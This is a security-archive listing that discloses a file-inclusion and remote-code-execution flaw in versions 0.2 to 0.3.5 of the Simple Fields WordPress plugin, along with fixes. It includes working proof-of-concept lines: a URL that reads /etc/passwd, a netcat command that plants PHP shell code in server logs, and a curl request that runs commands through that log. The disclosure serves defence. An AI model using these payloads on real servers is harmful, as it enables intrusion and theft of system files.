exploit the possibilities

WordPress Simple Fields 0.3.5 File Inclusion / Remote Code Execution

WordPress Simple Fields 0.3.5 File Inclusion / Remote Code Execution
Posted Apr 9, 2018
Authored by Graeme Robinson

WordPress Simple Fields plugin versions 0.2 through 0.3.5 suffer from file inclusion and remote code execution vulnerabilities.

tags | exploit, remote, vulnerability, code execution, file inclusion
MD5 | 6e2bf334cdac7f3f761fe52b39953c1e

WordPress Simple Fields 0.3.5 File Inclusion / Remote Code Execution

Change Mirror Download
# Exploit Title: Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
# Date: 2018-04-08
# Exploit Author: Graeme Robinson
# Contact: @Grasec
# Vendor Homepage: http://simple-fields.com
# Software Link: https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip
# Version: 0.2 - 0.3.5
# Tested on: Ubuntu 16.04.4 + PHP 5.3.0
# Category: webapps


1. Description
Versions 0.2 to 0.3.5 of the Simple Fields WordPress plugin are vulnerable to local file inclusion if running on PHP <5.3.4. This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini.

PHP <5.3.4 is required because the exploit relies on the ability to inject a null byte to terminate a string before the script expects it to be and this was fixed in PHP 5.3.4

The vulnerability was fixed (commented out) in version 0.3.6 on 2011-02-03. Simple Fields is no longer actively developed, since 2016-02-27 (http://simple-fields.com/2016/bye-bye-simple-fields/)

The vulnerable line of code in simple_fields.php is:
require( $_GET["wp_abspath"] . './wp-blog-header.php' );


2. Proof of concept
LFI:
http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00

RCE:
$ echo "<?system(\$_GET['cmd'])?>"|nc host 80
$ curl "http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=../../../../../logs/access_log%00&cmd=id"


3. Solutions:
* Upgrade PHP to 5.3.4+
* Update Simple Fields to 0.3.6+
* Stop using Simple Fields because it is no longer supported


4. Relevant Links:
* http://simple-fields.com
* https://wordpress.org/plugins/simple-fields/
* https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip
* https://github.com/bonny/WordPress-Simple-Fields

Login or Register to add favorites

File Archive:

February 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    33 Files
  • 2
    Feb 2nd
    30 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    8 Files
  • 5
    Feb 5th
    11 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    1 Files
  • 8
    Feb 8th
    37 Files
  • 9
    Feb 9th
    15 Files
  • 10
    Feb 10th
    11 Files
  • 11
    Feb 11th
    26 Files
  • 12
    Feb 12th
    8 Files
  • 13
    Feb 13th
    1 Files
  • 14
    Feb 14th
    1 Files
  • 15
    Feb 15th
    9 Files
  • 16
    Feb 16th
    33 Files
  • 17
    Feb 17th
    6 Files
  • 18
    Feb 18th
    10 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    1 Files
  • 21
    Feb 21st
    1 Files
  • 22
    Feb 22nd
    17 Files
  • 23
    Feb 23rd
    15 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    28 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close